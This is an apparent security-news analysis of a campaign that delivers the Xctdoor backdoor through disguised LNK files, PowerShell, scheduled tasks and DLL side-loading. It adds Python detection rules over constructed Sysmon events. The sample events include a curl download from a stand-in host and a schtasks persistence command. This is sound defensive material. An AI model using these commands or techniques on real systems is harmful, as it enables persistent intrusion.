Hackers Exploit PowerShell to Deploy Xctdoor Backdoor

Cybercriminals are targeting corporate employees with malicious LNK (Windows shortcut) files disguised as job application documents. A shortcut file runs whatever command is stored in its target field, so when an unsuspecting user double-clicks what looks like a résumé, the file silently starts an infection chain that ends in the Xctdoor backdoor and gives the attacker persistent access to the compromised system.

The chain is built entirely from tools that ship with Windows: PowerShell, VBScript (run through the Windows Script Host) and batch files. Opening the LNK file drops a series of scripts with randomly generated names into the system's public directories. These scripts work together to register a scheduled task named "Office365" that runs a VBScript file every ten minutes, so the malware is relaunched even if a running instance is killed.

Further analysis shows that the PowerShell script downloads additional components from an external server with curl, which is present as curl.exe on Windows 10 and later, so no download tool has to be dropped. Some of the components are Base64-encoded; once decoded they are written out as further PowerShell scripts in the public directories. A subsequent script creates a shortcut in the Startup folder and decrypts the downloaded files into an executable, a DLL and supporting data files.

To evade detection, the attackers use DLL side-loading. They launch ProximityUxHost.exe, a legitimate Microsoft-signed Windows binary, from the directory where they have placed a malicious DLL named ProximityCommon.dll, the name of a library the program loads by name. Because Windows searches the application's own directory before the system directories, the malicious DLL is loaded in place of the genuine one and the payload runs inside a process whose executable is trusted and signed. Reputation or allow-listing checks that look only at the executable therefore see nothing unusual.
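The stages described above (the "Office365" task, scripts staged under the public directory, the curl download, the Startup shortcut and the ProximityUxHost.exe/ProximityCommon.dll side-load) each leave a distinct trace in endpoint telemetry. The following is an added example, not code from the article or from the researchers who analysed the malware: a small set of detection rules run over constructed Sysmon-style events. The field names follow Sysmon's schema (EventID, Image, ParentImage, CommandLine, ImageLoaded, TargetFilename); the sample events, file names and URL are constructed for illustration and are not indicators from the campaign.

```python
# Detection rules for the Xctdoor delivery chain, run over constructed
# Sysmon-style events. Added example; not the article's or the analysts' code.
# Sample paths, script names and the URL below are constructed, not real IOCs.
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
PUBLIC_DIR = "c:\\users\\public\\"
SCRIPT_EXT = (".vbs", ".ps1", ".bat", ".cmd")


def _f(ev, key):
    """Return an event field lower-cased, or '' if absent."""
    return str(ev.get(key, "")).lower()


def _in_dirs(path, dirs):
    return any(path.startswith(d) for d in dirs)


def rule_office365_task(ev):
    """schtasks.exe creating a task named Office365 that runs a script host
    on a minute-based schedule (the article: VBScript every ten minutes)."""
    if ev.get("EventID") != 1 or not _f(ev, "Image").endswith("schtasks.exe"):
        return False
    cmd = _f(ev, "CommandLine")
    return ("/create" in cmd
            and re.search(r'/tn\s+"?office365"?', cmd) is not None
            and re.search(r"\b[wc]script(\.exe)?\b", cmd) is not None
            and "/sc minute" in cmd)


def rule_script_from_public(ev):
    """A script host executing a script that lives under C:\\Users\\Public,
    where the chain stages its randomly named .vbs/.ps1/.bat files."""
    if ev.get("EventID") != 1:
        return False
    host = _f(ev, "Image").rsplit("\\", 1)[-1]
    if host not in ("wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"):
        return False
    cmd = _f(ev, "CommandLine")
    return PUBLIC_DIR in cmd and any(ext in cmd for ext in SCRIPT_EXT)


def rule_curl_to_public(ev):
    """curl.exe spawned by PowerShell, fetching a URL and writing the
    response under C:\\Users\\Public (the downloader stage)."""
    if ev.get("EventID") != 1 or not _f(ev, "Image").endswith("curl.exe"):
        return False
    cmd = _f(ev, "CommandLine")
    return (_f(ev, "ParentImage").endswith("powershell.exe")
            and re.search(r"https?://", cmd) is not None
            and PUBLIC_DIR in cmd)


def rule_proximity_sideload(ev):
    """ProximityUxHost.exe loading ProximityCommon.dll where either file sits
    outside the Windows system directories: the side-loading pair."""
    if ev.get("EventID") != 7:
        return False
    image, dll = _f(ev, "Image"), _f(ev, "ImageLoaded")
    if not (image.endswith("\\proximityuxhost.exe")
            and dll.endswith("\\proximitycommon.dll")):
        return False
    return not (_in_dirs(image, SYSTEM_DIRS) and _in_dirs(dll, SYSTEM_DIRS))


def rule_startup_shortcut(ev):
    """A .lnk written into a Startup folder (the second persistence path)."""
    if ev.get("EventID") != 11:
        return False
    target = _f(ev, "TargetFilename")
    return "\\start menu\\programs\\startup\\" in target and target.endswith(".lnk")


RULES = (rule_office365_task, rule_script_from_public, rule_curl_to_public,
         rule_proximity_sideload, rule_startup_shortcut)


def detect(events):
    """Return [(event index, rule name)] for every rule that fires."""
    return [(i, r.__name__) for i, ev in enumerate(events) for r in RULES if r(ev)]


# Constructed telemetry: one event per stage, then two benign events (a normal
# schtasks query and the genuine ProximityUxHost.exe loading its DLL from
# System32) that must not fire.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": 'schtasks /create /tn "Office365" /sc minute /mo 10 '
                    '/tr "wscript.exe C:\\Users\\Public\\qzxw.vbs"'},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "wscript.exe C:\\Users\\Public\\qzxw.vbs"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe",
     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "curl.exe http://example.invalid/a -o C:\\Users\\Public\\a.txt"},
    {"EventID": 7, "Image": "C:\\Users\\Public\\ProximityUxHost.exe",
     "ImageLoaded": "C:\\Users\\Public\\ProximityCommon.dll"},
    {"EventID": 11, "TargetFilename": "C:\\Users\\bob\\AppData\\Roaming\\Microsoft"
                                      "\\Windows\\Start Menu\\Programs\\Startup\\x.lnk"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": "schtasks /query /tn Backup"},
    {"EventID": 7, "Image": "C:\\Windows\\System32\\ProximityUxHost.exe",
     "ImageLoaded": "C:\\Windows\\System32\\ProximityCommon.dll"},
]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Each rule keys on behaviour rather than a file hash, which is the point made later in the article: the task name, the public-directory staging, the PowerShell-to-curl parent chain and a trusted binary loading its DLL from a user-writable path all survive a rebuild of the payload. The side-load rule deliberately stays quiet for the genuine ProximityUxHost.exe in System32, which is the false positive an analyst would otherwise chase first.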

Xctdoor is built for long-term access: it communicates with an external command and control server and executes the commands it receives. The scheduled task and the Startup shortcut give it two independent persistence paths, so it survives reboots and keeps the attacker's foothold even if one of the two is removed.

This campaign poses a significant threat to organizations, particularly departments that frequently handle external documents, such as human resources, sales, and customer support. The use of seemingly innocuous job application files increases the likelihood of successful infection, as employees may open these files without suspicion.

More broadly, the campaign shows attackers leaning on legitimate system tools to deploy malware. PowerShell, the Windows Script Host, schtasks and curl are all signed Microsoft binaries that administrators use every day, so their execution alone is not an alert, and no custom executable touches disk until late in the chain, which blunts file-hash and signature based detection. Defences therefore have to key on behaviour: the content of scripts, command lines, scheduled task creation and where processes load their DLLs from.

To defend against these threats, organizations should train employees to treat unsolicited attachments with suspicion, including ones that look like routine job applications, and should consider blocking or quarantining .lnk attachments at the mail gateway. On the endpoint, PowerShell script block logging and AMSI expose decoded script content, application control can restrict wscript.exe and cscript.exe to approved scripts, and monitoring of scheduled task creation and of DLL loads from user-writable directories catches the persistence and side-loading stages before Xctdoor is fully deployed.